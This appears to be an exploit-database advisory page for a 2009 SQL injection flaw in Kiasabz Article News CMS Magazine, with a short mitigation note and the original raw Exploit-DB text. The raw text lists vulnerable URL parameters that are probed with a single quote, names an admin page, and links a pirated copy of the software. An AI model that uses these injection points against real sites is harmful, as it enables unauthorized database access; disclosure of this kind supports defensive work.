Kiasabz Article News CMS Magazine SQL Injection Vulnerability

vendor:

Article News CMS Magazine

by:

indoushka

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Article News CMS Magazine

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2009

Kiasabz Article News CMS Magazine SQL Injection Vulnerability

Kiasabz Article News CMS Magazine is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable web application. This can be done by appending malicious SQL queries to the vulnerable URL parameters. For example, http://127.0.0.1/Kiasabz/essay.php?essaycategory=' is vulnerable to SQL injection.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

 ========================================================================================                  
| # Title    : Kiasabz Article News CMS Magazine SQL Injection Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                              
| # Web Site : http://dl.p30vel.ir/scripts/Kiasabz.Article.News.CMS.Magazine.NulLed.And.Ripped.bY.Eh3an.P30vel.zip                                                                                                                                   
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Sql                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1 - http://127.0.0.1/Kiasabz/essay.php?essaycategory='
 
 2 - http://127.0.0.1/Kiasabz/news.php?category='
 
 3 - http://127.0.0.1/Kiasabz/admin/main.php

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------